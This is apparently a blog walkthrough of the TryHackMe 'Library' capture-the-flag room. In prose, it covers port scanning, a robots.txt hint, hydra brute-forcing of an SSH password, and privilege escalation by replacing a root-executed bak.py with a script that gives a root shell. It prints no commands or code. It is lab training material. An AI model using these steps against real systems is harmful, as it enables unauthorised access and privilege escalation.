Through The Looking Glass
Author
Shirish Ranjan
A padawan in the ways of red teaming and blogging with the goal of mastering techniques in hacking into anything this world has to offer
Shirish Ranjan
A padawan in the ways of red teaming and blogging with the goal of mastering techniques in hacking into anything this world has to offer
LibraryToday we are going to solve the room named "Library" in the TryHackMe website. Well, without delaying any further lets get right to it. Task 1 - #1, #2First we perform an nmap scan tp check which ports are open and the services running on them. the flags used with nmap for this scan were "-sC" for a basic script scan, "-sV" for a service version scan and "-p-" to scan for any open ports. port's 22 and 80 are open and they run the ssh and http services respectively. For now we have to shelve the idea of logging in via ssh becaus we do not have the required credentials. Time to see what the application is like. and it turns out to be a blog site and it has a bunch of sections like the comments section and the post comments section that are all in one web page and the source code does not have anything that concerns this challenge. Just a hunch but lets check out the directory robots.txt. In it there might be some clues as to what can be done to get more information about this website. User agent is rockyou, must be a hint stating that we might find something if we use the wordlist rockyou.txt. So first thing that comes to mind is directory busting using gobuster and rockyou.txt. But it doesnt show anything that stands out. Let's try observing the website once again for any clues. And voila! theres a blog posted by a user named meliodas which we can use. Since we know the username lets find the password using hydra. Good now that we got the password the next step would be login using ssh since we were brute forcing passwords for ssh. Once we establish a connection to the remote target machine, now we just have to find the flags. The first flag is in the user.txt file in the current directory. For the next flag we need escalted privileges. To find out the method to get those privileges we use the command sudo -l. On top of that theres an interesting file named bak.py in this directory. Let's try running that file with sudo. Couldn't execute it. Since theres no password required to execute the higher privileged command with sudo thought there was a chance that the bak.py file could be executed with higher priviliges. Since it specifies the location from which python can be executed lets navigate to that folder which is /usr/bin and then execute the bak.py file. Look its working, Now to view the contents of this file. Looks like its a file thats getting executed with root privileges. Lets try and replace that file with one of our own homemade bak.py file and delete the original, which will give us root shell when we run that file. Now that we got the root shell lets navigate to where the root.txt file is located and get that flag. |
Author
|